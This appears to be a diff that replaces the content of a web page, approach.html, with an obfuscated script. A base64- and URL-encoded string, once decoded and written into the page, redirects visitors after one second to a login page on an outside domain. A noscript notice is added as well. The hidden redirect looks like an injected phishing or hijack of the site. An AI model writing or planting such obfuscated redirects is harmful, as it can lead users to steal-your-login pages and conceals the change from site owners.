--- a/approach.html
+++ b/approach.html
@@ -1,1 +1,5 @@
-<
+<!DOCTYPE html>
+<script type="text/javascript">
+document.write(decodeURIComponent(atob('JTNDbWV0YSUyMGh0dHAtZXF1aXYlMjAlM0QlMjAlMjJyZWZyZXNoJTIyJTIwY29udGVudCUyMCUzRCUyMCUyMjElM0IlMjB1cmwlMjAlM0QlMjBodHRwcyUzQS8vbG9naW4ucmVkbGF0ZW5jeS5jb20vbG9naW4lMjIvJTNFJTBB')));
+</script>
+<noscript>You must enable javascript in your browser to view this webpage.</noscript>
